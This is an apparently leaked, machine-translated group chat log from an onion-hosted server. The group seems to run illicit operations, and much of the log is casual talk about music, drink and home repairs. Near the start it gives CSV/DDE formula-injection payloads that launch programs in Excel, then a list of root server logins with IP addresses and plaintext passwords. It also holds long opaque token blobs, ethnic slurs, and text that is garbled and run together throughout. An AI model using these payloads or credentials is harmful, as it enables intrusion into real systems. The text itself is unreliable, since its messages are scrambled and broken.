=cmd|' /C notepad'!'A1'
``You're all grown up boys, you're coping with your own hyperactivity in the chat room is a sure sign of a starving society))))[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=XDPFzib3Mk6y7BawH) so you're our helmsman only AMFROST the wheels, you shit everything up ! Dima can't manage to wash our stables>Quotes are clean, answers are not clean

it's already being cleanedSomehow it's been cleanedQuotes are being cleaned, answers are not)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Atn7izfLA89eXM7YX) but can't you automate it somehow with the crown? interesting property...it either cleans files every day, or histories)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general? msg=AEwqDqqgcW5gDbhWHpmsg=AEwqDqgcW5gDbhWHp) it's selectively cleaned but the schizophrenia joke would be great guys, is the chat's history not cleaned now?the bong was taken away from kinkong) sorry @ruby @ryan :rofl:ahahaparovozik steamroller took:D))ryan and gbue are two different people )ryan asked) before he asked who would do ityou asked a question, you answered it)pussy glue it if he's so sunglasses:lol why do you do it to yourselfit's like a psychotherapy course, you need to voice the problem to get to the bottom of it[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwidonion/channel/general?msg=X2ohYNRveqBmaHiKs) are you talking to yourself?)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=X2ohYNRveqBmaHiKs) knock down and offuscizeyou're dry``https://www.youtube.com/watch?v=0Vi-4CvAvWQ` want me to be a Demon:joy:[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=cRMbNdAsfPunJcs9C) compile, cvs with paiload do a wonderful !of course, and about friends and how important it is to help each other about the locomotive?) want me to sing you a song? Suhorukov again in the mud at the clowns / presidents did not see that e2enet was turned on, it just does not work in conjunction with e2eOtr all limps?!?! Need a test file test.csv to this exploit to test?
Then just save this code in the file test.csv
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
```
Excel will run a calculator with notepadpereepid19)What do you need to do there ?
https://github.com/kn81/csv-injection-payloads-master[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=e2GfGSuearK5dDKDg) then you need to hang in kilograms[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=YazBAXp3p9XetNWQ3) dunaev collar[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=g4DvgB6dswkD2eKwu) what are you doing? 4 Gb pour...I wrote in ls.+@all Hello All! Friends! Urgently update your work in the git, will check before issuing zP! broke package builder or packages themselves, I decided to update packages via npm install --legacy-peer-deps and how to return everything back to work, and not one pr
root 194.15.113.155 123qweASDzxc
root 162.55.32.153 KLwhVjkixqXvwcvvfwNx
root 80.71.158.106 Gk602noP4Mkc
root 148.163.42.213 ejqXPk9nxfwi6Cy
root 188.127.235.177 hMtVzuj9GHV6
root 185.163.47.176 ohnoo_m3Ooqu
root 23.160.193.221 ucdhsumhjxys
root 5.255.102.10 40ed30fa3d141abe1fbd45f88b361e0d
root 185.16.40.99 123qweASDzxc10 wpcdhsumjxxys rootGarfield Is this a bot? )))))))```
7:35 PM
yes, by the way, who was chosen as the employee of the month, who decorated the honor board of our team?))
``````
1:05 PM
ah, by the way, who was chosen employee of the month, who emblazoned our team's wall of fame?))
``collin and guapkot you blew it )yes, by the way, announce who was chosen employee of the month, who adorned the honor board of our team?))Oh, a very good point. I agree.Main thing, bro, don't get drunk! I'm fucked up today Rocket! And you have a good time bro! Have a nice weekend))I can well assume that in certain circles this syntax is possible :nerd:is there any slang in which a credit is a credit?)yes, I cut it down, then I read it myself and thought that in the local slang it was for many in the first place))Garfield not immediately realized that the credits are loans, not loans ;)not only from usury should banks have income. They need to expand the "rabnet", the analog of botnets, to show who has power and strength here, I think they need to block all the accounts for show.Garfield that's what I mean - why can't they just write it off, without the block? Yeah, banks are fed up with selling their loans with credit cards. They seize my property for pennies on the dollar, a few thousand if I owe them. By the way, once upon a time, long time ago, I worked in Tenkovo) *for 3 whole days*))) - The idea was to call potential customers and buy them services - where their personal details came from - I don't know - they just gave them away, of course, because of some 6,000 rubles to block all accounts, they leak the databases and resell them, the databases are easy to find anyone, let alone personal details))) if they call from prisons and know your name... Bailiffs tried to block my accounts in 2016. I left here in 2011 from another city, there phone (wired) left the new tenants. So they all these years for the body did not pay, and I have accumulated as much as 6000 p. debt. In short, the bailiffs then did not get to my current accounts, and got to them. There I supposedly withdrew all the money when I left. But somehow, by some miracle, 1000 rubles was left, and that's how much they wrote off :)
But now it probably will not work, because bigdata on all users began to collect.Ie, now hide from big brother in the classic banking system is not the fate of all banks now collect bigdata for the special services, as far as I heard, all drain, as connected to the common system. or rather bailiffs send letters to all banks, they say block it, and banks make decisions @ Garfield most likely will not leak. But there is usually a ridiculous limit. I think it is unlikely that they will leak anything out of there. i did not use it, i tried it out myself, it's OK. By the way, the money comes normally to the virtual card? if you create it in Sber, for example? Who tried it?? Does anyone have experience who does not leak information to bailiffs? so i now think about tinkof - they are almost ahead of sber and Wtb all the information disclosed i made tinkof as something on recommendation, for themselves. I think now I am thinking that they are almost ahead of Berezniki and WTB all the information has been disclosed. tinkof made it for me as a recommendation, for myself. purely as a payment wallet in shops, as I was assured there can not be any write-offs by state agencies. and I had a fine not paid, which I forgot about and already bailiffs passed all this business. so my tinkof card without balance in minus, I even did not have time to use it much, something paid a couple of times, the balance was 100 rubles may> by the way, is the tinkof card better than the Sber? (like the commission is less and when exchanging the same amount of BTC comes a little more dough)?
> In general, Sber and WTB and similar banks are not our option.
I`ve never noticed. I receive both on Tinkov and on VTB-card, I did not notice the difference. I only use my Spurbank card to pay for utilities/telephone/internet. In this case, the bank would have to pay more than 10 thousand rubles in it.otpadu na chastaga) is not a manse si pas sys magazine fed the former deputy of the State Duma for food fund help owners exchange office came the payment from the exchange office with the label - Charity, Milone will breed polittsrach) well the successor nevertheless, in every way immortalized the statesmanA "In Russia, Blat ... "Well, I don't think Russia is the same without GDP. As long as GDP rules, we will not become bananas.i think, when did they manage to declare themselves a federal district? i thought it was an enclave of Belarusians headed by the local Bashkirian PapaBashkiria it looks likeWhat is the RB in Russia? Or is it the RB which is in the Russian Federation?)General coronation is that's what I get the joke, ok ) I say just in case who wants to rest and work tired, you can pay for your own account, but I'm not sure that everyone can, there are critical projects where you can not downtimeada I was kiddingmy soldiers good luck pay state employees, we are not state employees Government does not say that here is money dear, take a walk on them yes and no holidays it guys, we do not have holidays> And how your stock of homeless?
I replenish for the winter, all beer at the expense of the institution! How do we work on holidays? And we have a general strike in Belarus on Monday:zany_face:I really hope that we will continue without fines, and bonuses at the expense of the institution will beThanks for this, I see that the financial responsibility and my shouting work, you get together and more responsible, someone forgiven despite the breaches, just a hand in my face, and I just gave up) respectukha guys!)There were petty fines, but I do not want to focus on it, they know who works well, not just them. thanks for the good work, give a $500 bonus to both of you:partying_face:ryan for taking the initiative with the new delivery methodcolin for overcoming the bouncing and for pulling the project in such difficult conditions. @collin and @ryan will share the title of employee of the month between them @garfield how is your cat doing?friendship won)) ah, by the way, who was chosen employee of the month, who has decorated the team's wall of fame?)) Really, what are our options?) topa teaneck what is our option? it is necessary to make myselfa generally sber or Wtb and similar banks are not our option essentially) dakstat, is tenkovo card better than sber? (the commission is lower and the exchange of the same amount of BTC yields a bit more dough) and what's the holiday?)I shook my shoulders yesterday :rolling_eyes:overloaded our spaceship does not fly))) well, the law of preservation of online:grin:you come in Frances kicked out, the fuck you broadAah shit, and rebooted the router? fixed! record - 3 times delete Tor B, 2 times to change the VPN and 3 times the bot our shamanic prayer rite held? yes it starts oTaka ::scream:Praise to the botWho is burning WP can send purses, the main thing rocket not put me :sweat_smile:tor connection all right, but shit did not gruzilon same time I wrote here as that not so long ago. I had a similar bug - solved by changing the configuration of the VPN, I connected another. but it was not with the rocket was all tried everything can not enter the angel in the morning if I understand correctly, then elroy has a problem with nodes .. that is, with communication with them...it's kind of interesting for relays, `apt search nyx@elroy , and you try to manage torus chains with *nyx*@demetrius, there's nothing with the connection... Look in the toadInstall one, in different places just put it...and it is not portable? Download a portable tor browser, it will make a new chain in its directory. I can't get used to tor-browser with direct output, @elroy tor-browser is updating itself or you mean tor-chain?Yes so far so good it seemsObnovitorya that once again one with a decrepit rocket and all is well? We can not wait)) Urgently leave for an hour, I will come back and start paying wages Good news on Friday morning) Good dayGentlemen teamsters - waiting for updated information on your subordinates. If anyone has any sanctions - please let me know:) Today paydayGood morning.доброеeyJhbGciOiJBaqenz+nHfz2/1cfGO7jhQFN+vFUM07z23XypYFalKx9OsyfX5WkLqq15sya4+TUE7Jzzp/qHltT8881JhUMez7Ds/t3U8TRPxKwxJCI79IS03cP4wFF8HDgcrs2E4ZZhgpcqMIvy2yiJ1xbu0MAyU5DgSyZErpije7IQSnAJBAbk4a4Omek4obFIt6fhX2jGeyJhbGciOiJBOq4yoO5kCsvNN4P6QIx2kQPj9c7gRyS1PK3L7oagckO5UnpMtxdC/w6TCMjXtscdIe8VeIYs3cmJ7qvnAlxgBx519/pUp6XiXBmoitL9YZ2RtwPO63QhEVI/IUP+U92eDh6RZ78zX7LBob8QCynWkirxaZK0nAcjLM5/Kc6zvS1U1TK1FQ49HD2e+HfztLZHHH43XPYJimspmuHy3rKsDT5kFVunvLQllVGpSCgQkvBLMfYHh+y1BcfYsy0uVEyJnQ9ldj2gOyDWaKDhSRKniWVE9SS0JJDbmavBXkCKIMkr9+b6y2ZxFGPijZJLYjYdC4va0LGiZqCVmdqBsjVpUykWAznLU99qSfJqJ7ZCn5CgFYzhNhrAvmNlEGP8ZHof7tjhwuJfarBeC2BgEkLDP9mfN8jolZ38DcHS/8pF92KB7riAVWOX7okOljgAJyZK8JqnFa7nuIJkA+m4LRCurS+fvh/Y6nT+Rv96RI02aGUJ9oB/LxaEHZJihO6tvwDyKjD4iTFCgzTGU60OU+xYZkNZxxe1TSwUJ3yg8NJJ/ZlmCnZdmFktgpWgTpZIy/QOV7y0+mKS3i3NaufQFU/TrM1est1cy5NuB+HqP8ABnqE2fgmkKXGgaHXAIdm484Igwn1ZaTHi9dHjBPhCqzg0Aw==eyJhbGciOiJBu9urLmAmAEwZsmXOuy3Ez1VeGB5Kjrfzwcp/NsOshTB8tq7E77OEZipLSTu5iIkSvlNxh+2gMrt9g5CtC7NaWdMI6+FGbBUI+dkUMBhzmF8n5um4pq/9uyBx  In 500 + posts, all written and nothing to addWeird, and silence..... :)yesGroup of blood is on the sleeve, my serial number is on the sleeve,
Wish me luck in battle, wish me luck in battle:
Don't stay in this grass, don't stay in this grass.
Wish me luck, wish me luck! (Tsoy zhivyf pakanado at them with a request)Angela to Merkel flew?)yesterday 500+ messages in the chat, it was scary to readnu at least 3)alive there?) pongping `Uncle Ghenya - Without Rules (final) `)) in touch @rags you too danke.  In the subject)):smiling_face_with_3_hearts:oh yes what:kissing_heart:clearly)mutual)evening)thank you guys for a good)) similarly, the old track just go to sleep)so okay, all am good morninga hz, do not follow him)something like noisy by the way, "here and all. so what" track time - no it sukby would be good) let's write) about hair from the ears you can write a text ... interesting gettings)so the old age, here it comes, and it seemed yesterday still was somewhere beyond Everest ahahahaha)))) and if hair grows from the ears this is daaaa:grin:ping fuckin(ping))) the beard is nice to a man, but if there is no beard it's no problemIlya Slovesnik like a man's beard)a beard on birthdays in kindergarten sang edith piaf under the sky in Paris dont know it cheep chep chalyari pro ducklingsUnder the sky in Paris my caronka on accordion was when tov kindergarten sang in french at school "On the merry ducks" and also Edith Piaf. I learned the frenchman also adriano chelentano where would the powerhouse be if there were no you)et si tu n'existais razDessan theme also frenchmen for the judgment of society?joe dasseypian the author will throw you here in a chat:grin:it's just a fantasyJim made Beam like :rofl: but the idea is eternal so there is only here, and the rest, what could be -:thumbsup:all this in 21 we will leave those who in our past awareness of that year existed, so let there and fuck up who you in the past))i.e. i.e. the conscious choice of ass - as a certain hopelessness itselfNo, it should be a conscious choice as less often as possible. kick it or fuck it up like a snowdrop sometimes there is no way out but life is a thing yea, you're right it's ok for yourself, the main thing is to have time planned for yourself, i think so, otherwise ugly :roflI'm already running out of viskarek. Self-education is just for me, it's not a pain, the problem for me is to form an answer, or to perceive it by ear, it's not a problem to speak English, nothing is lost) and not gained)well, all in all my wife is busy with the child. or is it better to leave everything as it is :grin:1 pedagogical 2 philological:)she has two degrees in english my wife studies guess who))) guess what it is:rofl:bitcha actually there was candy and dreamsbeen searching for the words can be a dreamheard something interesting decided to practice on the music ok I sleep all happy january, love all) fucking study inglishvot so ... how many fans of the beautiful genius among us it turns out)audiomaniac:japanese_ogre:))) I agree with the fact that he just fucked up in this businessa I do not agree that he is powerful(but not really)and it's like he has a copyright theme :thumbsup:yes too powerful man `https://www.youtube.com/watch?v=uWbBSGAYns8 `sekili wo:joy::grin:this spoiler immediately looks at you, as on shit)) or so "we fucked all of you in the mouth it was izi "maybe it was written not to sound egoistic =)so who is a pro it is still a concept to themselves here we have generally other keys in the profession)) but fuck these professionals here all not a proyou can play with even higher qualityWe are not professionals in the description)) no, suddenly the fuck the author is still alive and ask john stump. their hands are growing with geomtric progression)))) \How can you create this is the question of a million))) 4 is not enough just did not get there)) `https://www.youtube.com/watch?v=_5FFYMe-MGE `in four hands?) I threw a link as a Death of a Pianist - 2 hz how can you play this also normal there is such a movie Pianistebane just like his game.t live `https://www.youtube.com/watch?v=_5FFYMe-MGE` there's also a sheet there about how art is real, genuine changes anyone and makes you feel, no matter how hard you try to resist. and the bully was fucking with the eternal scales because of the stench)) john stump waltz of the dead
John stump waltz of the dead... John stump waltz of the dead... John stump waltz of the dead... https://www.youtube.com/watch?v=ynEscyMdIjg... Noonono or notMaksimov seems to be something like this myself... I found one verse by heart from school, Eagle I remember who the author also came in about the fiddler and the neighbor hooligan on TV a few days ago saw a performance. bluebird contest, there Inna Churikova reads a verse about the fiddler hooligan. Can not find it, but just a fire poem, the author does not remember, I just the first time I heard a workpara minute) hope to find it) fucking rebus myself did it really is a masterpiece as a man just for fun composeda I saw and heard myself wanted to, i started studying the sheet music) i'll show you something)) grieg is strong, the melody will see our great-great-(great)x*x times)) talent is a very elastic notion but he didn't invent anything of his own, they also call him a talent you just watch how she plays!//www.Youtube.com/watch?v=gSY-wD4l5DM` seems to be a normal recording from a phone, bro, you can't really hear anything in the mountain king's cave))Antonio Vivaldi's cycle "The Seasons" WINTER part 1:innocent:You should start the year with something good, something eternal. And what could be more eternal than music + https://www.youtube.com/watch?v=nYAXNq8rX0I? Let's say it all costs a fuckload of guitars to play live, and so on.there it is, you'll pick up analog to your taste (analog means live preamps, guitar cabinets) and then there's more, if you get into everything more or less, and you like itManuals on YouTube to help you with all thiszatem download from a torrent guitar rig 6 for your eyespf ukfpfsteinberg ur12shcha say around whatvneshnyaya buy sound card instrumentalpurchase guitar on a budgetIn terms starting now @Garfieldoktax if you find one throwtim straight from the soul)) what solos and .e.) from the first take) there's a video on YouTube where he plays at the stadium at the hockey game zapisalu livenu that is. i can't say anything about him in terms of live music, i told you about him. i've seen him before, he has an aux output or something like that in a budget`https://www.youtube.com/watch?v=SINjsb3plWI `but so and dick scored))) I once looked all sorts of attachments, so that the "whole house" does not have to brand, with zvkosnimy something like @Garfield now sekMichel Sebin on the letter ` connect it in `...` deleted the linkthis guy found it, and what a beginner on the guitar advise in general ? I don't have any problems with my hearing, even in terms of "home" vocals. studied at the music school, but not strinahi like that look at what he plays as a cannon playstocenimtam normal guy) in ls throw) aha) find skinumandy *oyi he took the soul of some young sanda there))) there and kveik he fucked up, and worm jmik, and contra with dendia remember in let's get married he was invited to shan tsungav let's get married)) but should know who is close to this subject also on electric guitars etc.д.The main thing is that he is a good electric guitar player, and he played at a hockey match I don't know his name, but he plays like a true soul, the guy's playing the guitar and he's good at playing guitar) he's just a good guitarist) well, the judgments are abstract)) nah, hammett is one of the virtuosos of our time ok) i don't know who he is) and his place was taken by Kirk hammettmastain was kicked out of metallica or something)) i dont know, i listened a long time ago, I listened a long time ago, but I liked it, I just remember it with a secret place, maybe by secret place you mean trust?megadeth band, yes there lyrics like)):)so i fell out, what is the power and the man respected? \they were not fuckin' guitarists at the time the lyrics are so-so it's not a secret play called the fuckin' theme balladmegadeth they have a song i kinda liked itcrete place uncle mastain i love and respect megadethmochoch bro power if you're playing) duke nukem theme i remember 10 years ago picked up this how to learn it and it's in the bag i can do anything, I can do it all, but the main thing is not to be lazy. I always wanted to learn the strings, and I just look at it sometimes and blow off the dust (and another one coming up just 2ogo I have a masterful guitar for 2k baa can you play a Chenit from Kveyk?i've been playing guitar for 15 years and i'm self-taught, i thought about starting with something simple i wanted to study too, but in the cave of the mountain king to learn how to play the piano))) 6 years music school, keyboard self-taught, i can't read from the sheet to read on the computer keyboard now i just work on my material, you know what's up?i'm also in the past) i've just recently put together a hobby, i'm just a musician myself))) \Fucking hell, they're everywhere already \https://www.youtube.com/watch?v=sQiD90jfKYE` rofl:rofl: i'll go listen to koko keyboard with danya milokhin on youtube and i have a phone)) who is it bro?) i hope they drink there? yeah i see mik and jim from the slips fucking riffs in some interview=) let's listen to what kind of music?I can not understand what is the point of this action, these people were identified by some psychologists, boring people from work, go with a beer can bought and drank near the pub, I have a friend who likes this 2-3 cans a week, I do not understand these people)) just turned around and over) and here on the third monitor chat opened just wanted to listen to a couple of tracks without distractions) no, alkgolism is when you booze for two or more days you have an interesting conversation here)fuck you flash)) you live out of time 10 minutes for a couple of seconds this is a verdict based on my childhood friendeboek is already dakajday on 2l beer I think not there how to classify, alkgolism is a couple or three cans of beer a week, is it so? Or am I confused something2 days booze it's overdone so you can really drink in short there is no one who does not drink so this year, will stay home most of the family work, someone has a family I do not mean that they are what kind of alkars) just drink with or without reason will return soon here either you with them, I'll be away from you for 10 minutes, you can't have a hangover. For example, today I drank for the second day, and before that, it's never happened, i have a social circle that includes a shitload of bluebeards, sometimes alcoholics - it's necessary) everyone drinks as they say just everyone i know i started working, got a family, i left my friends bluebeards long ago you can not even imagine)) the fuck you got in a society of alcohol-maniacs)) and i did not want to die a virgin it was crazy i used to not drink at all it seems to me unreal, or move, because everyone drinks all over the placeBut methinks how, seldoma how to relax without alcoholic beverages tomorrow, read today I'm going to update, if I can.....i have to change drinking for sleeping instead of drinking, you just have to have a rest. this year you have to change everything, you have to give up drinking and rest. it's true, all irritants have to be ruled out at once, while you are sober))) methods according to your tastes:I don't think I'd better relax, you may light a light bulb and ace the word stop in your head)) I don't like strong alcohol and snacks, but be careful if you don't have an ace up your sleeve, you can't drink =) but you should touch something sore or you'll get into a fit of rage, that's it, the price is fucked up, not like the price of oil and gasoline - so it's not right)) roughly speaking, they take alcohol =) so it's true that they distill it from oil so I'm a calm and kind-hearted man) vodka has become hard because it needs to be so. it is originally alcohol diluted with water. I don't know who and what started to dilute it with water, it's a tenth thing and I haven't even started drinking it yet) Jack Daniels costs dox and I'm too sorry to buy it. It's not the degree of alcohol that affects brains like a tumblerWater is a harsh swill40 is dangerous for me Mostly 25-20 I drink max 30))) Fucking tincture40 degrees is tincture =) I don't drink vodka You won't get over 250 rubles in buy more in QR:grinningthe most fuckin' tincture is a Ukrainian production Pervak without a snack the whole liter tried it I said let's try it then I remembered about the tincture I said let's go to my place for a couple of hours and then go home I remember I invited a friend I hid the alcohol sometimes better than any other valuable property =) but the tincture on the macadamia nuts - a fuckin' topic I don't know I'm not an expert here they say natural production the alcohol was natural the former owners worked for the pharma production That's why they hid the alcohol in Ethiopia. There's nothing to ferment it and it's the first time I've heard about it. I don't understand the ageing of alcohol, I'll write down the recipe: A guy in his old private house dug up a 3-liter can of alcohol, it was in the basement, and he bought an old house, the 70s. I've never tasted anything like this before, it's like a vitamin) They'll come back to hang over, will they bite too? And if you get them drunk on tincture?I've been drinking it all year round. I'm going back to the question of where to go, to Ethiopia but the natural product costs as much as an airplane, the more it costs the better it tastes, you fill it with sugar and macadamias nuts together with the skins, buy some good vodka (absolut for example), or if you have access to normal distillers it will be even better I can only advise you) you know what is the best fucking recipe for a good drink?)my verdict - shit))) like bourbon I remember the first time in my life I tried Jack Daniel's, sweet and sour taste, it's basically the biggest plus that it does not require anything at all, but I have not tried it bourbon?i will look up on googlea but i did not drink that stuff i did not classic jim, apple)) i will have to steal apple juice from my daughter) i ran out of pepsi) i still have half a bottle left i drink william (spiced) Jim Beam 1l ends with me)) i drank a glass of shampoo, sat for Youtube and went to bed sober for the 1st time in 2 weeks decided to get high) this is true in nature "what does not kill you makes you stronger" now i let myself, i'm drinking whiskey i thought i would never live to see the light of day, especially in the last 2 months. i have had the most fucked up year. i feel good now. i wish there was something to copy from. they're all copying. they're all lazy. i understand that this is bullshit in terms of the law. If someone somewhere once handed down a verdict that was needed and it was immediately accepted as a precedent, then all the other decisions will be identical, without even thinking... That's what I'm saying) our laws do not work) even though there was no topic on Caucasians. I told the same thing in court :grin:Next time you should say so: "churka" - this translates from some dialects of Caucasian languages as a sparrow. I'm proud to be a "software engineer-extremist". Fuck that. I'll rewrite everywhere. I'm in the process of registering myself a foreign phone number.:grinning:no, in the vk left a commentdirty plutonium bomb tried to set in motion or what?)) in the end `terrorism` was reclassified as extremism, because everyone just went bald from your ideas?) yes, me too. and if the penalty 10 kop, then they will fuckin' accept it directly through their portal. ))) which was recently )10 kopecks more and there will be a fine for extremism, property and other bullshit through this portal once a year I pay my land tax, I changed my driving license in summer, created an application on the state tax, I came and waited in line for 4-5 hours.
Dear users! For technical reasons authorization is temporarily unavailable. We apologize for the temporary inconvenience.`https://gosuslugi.pnzreg.ru/` The porky portal is still smoking :grinning:I hope this portal will die) such a service :grinning:Fuck ever such and where ever there will be... it's unfortunate, i saw it as a joke recently: in the revival of serfdom you can find out who your lord is on the portal of public services for all we need a principality where everyone will respect each other, and most importantly where the laws will be respected we need a principality, in which each of its residents will be a boyar)), however, as always, Yes, this scribe is creeping up by leaps and bounds, there's no doubt about it, but the conditions here are more or less, but everything goes to the final point of no return, my two hairs on my head) as everything is tight hereRussia is the best country in the world, just trust me.But I do not feel it my homeDa no, I'm just about the pejorative name itI love my homeland The motherland, I have nothing against itDa, it is so salty, and there are sharks Do not offend our homeland, it still Russia)preferably in a country that has no relation to russia Where can I get out of rushki?) Well, it's like if it's freezing, it's lights out at school, but everything is on the street immediately from the morning))) by the sea in 50 meters) tough))))) I was a kid how you found in the closet at my grandparents all kinds of coats, boots, in general, "trunk" of warmth of the war, in199 .. what something, itself in all it was wrapped up and has told that to me it on frost and has gone for a walk one in a court yard, in a snow to roll, from a hill to skate... and frost rare -35-38 somewhere was (the Volga region). Well in the end I was told later that he goes to school that way - it's warm, what the fuck are you doing? I had to say that I was sick))) fuck, and where do you hang out there that?)I had already forgotten about it, look at me):grin:i remember when i was 14 i stole my grandfather's gun and walked around the countryside shooting pheasants. i fucked nature in summer it was hot and in winter it was fucking cold in Amur region it was the far east in 146 socks and felt boots. i was small, wrapped up in 100 sweaters and 50 fur coats. it's true, where one can test their strength, that's minus the max.40 tested жабкоeyJhbGciOiJBm3igC0IAtymUIyOSt8SFbl3A4c1Tl9u9VcakqING54Wm8azLZHr1aqYCwd9qBbOGFxnkgXGPbM8uzRDyOuk0s20zB4q3x43i7nwoMiprHQ5Jm8pXMzoHIF4lqODyHPemvB23IcUcCo6sa9Y5UJNTdHKoU4Rj9AxPBTMWsFLYO4w=eyJhbGciOiJB57CuZ3itv4aMbkKgIMuUwp9kgOkZfJ1EzDiAAepaUmMQWogHoVrBtHcsTWZGldBZAhSJ2Od/MPtyIH9FY7hiIjXu7SltdFrUenYzH77VDvTjnsrCvLYQditfpHDCxTSW5Rrxoc0rVSn8PO91CP9CyDMicNymbQ1or3mKY8G8lEEWkDYt24Wb3dP/aLy9gNe1r/19iBSwduC5+O9pVvfEtwR46AR9EkpnP9UxmOD4Phk=eyJhbGciOiJBZQh385HoNsSC9zTRCvvuS6bwulh3zIKuX/FQf02HgJ/0pJ0T2t4TmxD5LZkfeljbU9eBrIDVaNVXdLFsVvZPNYrBSIulc68R7q5xs1uRmAIRHm2z8RhGrruB0Pl/eWhh5NJhUVhyBH4tR24uovG96QP6z9hmsz24mn+EvBcHE2SlX9+fIoRrFiZnh7HCwOOMnu0C30qWeinUsPH4ZWuhUgLZUHeQLFQZpYi+lHDWdaSFi261PfqC/0HrI6gFza+teyJhbGciOiJBl5UDrl0WY7DLWTKY4yoCaoWq1fF1rm1LjAMFNhCN8Pp2qpANRG5/FkTXej9dU7a9NrrZAxkeWtpVTJC95cppcrvp/SyiW9ljwshyL3oOjTr//xOL+Mq+RV0tK5EWspKjciiIQYs4ly5sS4549uRsXIVuY0Fscw6J4x0czzOwURGnptuZ7padBQp7IWFbBZcqYd4Ofva25YrnP1YGg0tNrowoKJysbSlPCU6owSGYY0/IQCpfgQM9mPFg2OyApLcOAq8YeZS/5FpTVtjQEmAPypFmbLqmM6Z1yFrLr6F6GWncW/ are there any mtb bike fans ? there's no one who's smartDima, your advice helps me and rocket more than ever :D it's such a reminder that nothing is perfect since the last update of rocket@kermit just do not respond to messages) it's funny, but there are no messages since the rise of rocket at all. it seems to have been a long time ago, it was not like that in the January 5 general? also noticed today? @all guys, what's wrong with the rocket? why messages that were repaired to the message remain in the history, so the dog hears a stranger barking exactly 2 times. if it does not help - goes into an ambush. chair-table-cabinet-cabinet and sits. You know, the thief is looking for the dog underneath and he rips his head off from above.
one friend said that you must have a safe door and a Doberman, otherwise there's no way.yeah, such my cat-behemoth would eat in one go my ex-chairman of the club of dog breeders trained guard dogs in this and 5 will not:grinning:hotdog doubleHotDogada even just a dog of 50 pounds not a guard. will not mess with it - will be very bobops to get. and train. no one will try[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=uwhttHWMfQPxZM6so) bombs from the new year, do not forget to throw in the entrance - it will be more fun) and now probably somewhere. plastic window on the back side of the profile is drilled against the handle and opens with the same handle))) previously, window shoppers could easily break into homes, and when they broke in, it was always on a tip: nobody gave a shit about the lock somehow, no one ever got in, I'll go close the lock ))) something boring, they knew who lived there.... :rolling_eyes:When the door is open, you are waiting for someone. And once you wait, by the law of life - no one will come. Lifehack)) Well, how come? I do not lock the door all my life, it's a habitThe most valuable thing in my apartment is me! If the door is strong, and the windows are made of glass, then ... The door must be strong, or else. Just not just the door))) never understood who puts the door for who knows how much, it's a red rag on the bull bluetooth )At the same time, with a clever look 5 minutes drilling gas concrete (which is a spoon to the tea ...).And we'll put Xiaomish lock on the fingerprint, we're not a shithole :Daga))) and titanium keys )There and the lock should be titanium I fix everything around the ruin))) I have my mom's engineer on the foam everything, foam is blue duct tape 21 centuryDoor is titanium, no one will pass ... But the right two nails, at best 8mm, and the left))) The rest of the foam))) So to speakTo be reliable ...)) Especially like companies that sell titanium doors for 100 + K, and which include installation and warranty. But the installation is done on the foam...I don't like it, Veldon, I'll soon have to do it all again, I figuratively) the usual shit smokes in the hallway (junkie ex, he understands 1 language - "IDISH") Well, in fact, on any rem work find shit after brigade eh, I would stink so bad at home )))) in the bought crib changed the front door - because it blew and stank in the entrance was (neighbor-grasshounds are fucking), so the door was normal, but ramshut with javshan put, the door turned out to be fine BUT the ramshut and jashashanu put up. in the grooves of the foam plastic punked and nepinyli on top of a natural guide, like a box does not leave the employee without control, you come and see if it will do the mind, the normal price150 rubles took for advice) 20Krub for work (if he do budit)electrician just came - 70 meters of cable said one room) power 2 wadrat took, well the meter should look at).a how much copper cable you bought?the discussion just don't give a fuck about nails in the wood, knots and whatnot, and bolgraka itself cost 4Kmany take sprsoil for 2500? If you buy one, you'll be the first in about half a year) I took a disk for a grinder to saw wood, the man told me - take this disk (cost 2500) because without hands it is more expensive to liveAga a complete fuckin' cutter, but we are experts in all areas!i know how to saw a wall with a grinder))) with a disk that costs more than a grinder, so as not to kill myself i did it with a grinder, but it's ideal Butt cutter would help) and connect the original wagamy cable take with reserves put wiring in a corrugated!i wanted to change the doors, so i stumbled upon a fucking soviet socket, and i'm sure it was aluminum core as well!)no, you should try to do the wiring properly, it'll cost you more later. Fuck, the bitches did the wiring in the wall before me, and the motherfuckers put it under the linoleum! I would have done it for sure! :)I have 1 cable in general on the surface of the walls) Oh, and what's wrong with wiring on the diagonal? :)oh, our lazybones enough who think - Oh, and what's wrong with wiring on the diagonalYutub bro teach not only wiring to change) yes, I do not like ravshans and jamshutovam in fact cable, hammer and stuff for razvodkin twoshkmenya wiring for hire someone or stremno, as once I had to penalize after the work of the gang budaki hands izzhopyna one room? but I did it myself somewhere near 15K per apartment, how much is it about?i changed the fuckin' cheda? what's yours? colleagues, who changed the wiring to copper? hello:nerd::construction_worker::vulcan: good productive year everyone[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=DWe949bDfpYqfPthr) always ready) hello.:zany_face:Hello all! Ready for battle :)Hi, I'll join late today, 16:00 MSK what's all the hubbub? https://www.youtube.com/watch?v=NTiFIdSzaSIнаша)nashaveldon not yours for nothing ... whiteshaka nasha jest neverOh, batey, there it is! veldon where? No kidding.and it's not crosses+++agree! belorashka good country.Ok, question removed.)))))))))) Come on!!! Do not swear not будемИ?@thomasЧто?таксНет.а why he Oh, the steamroller, Awww.Glad.Hello brent, good to see youTomas, pedalsThis is 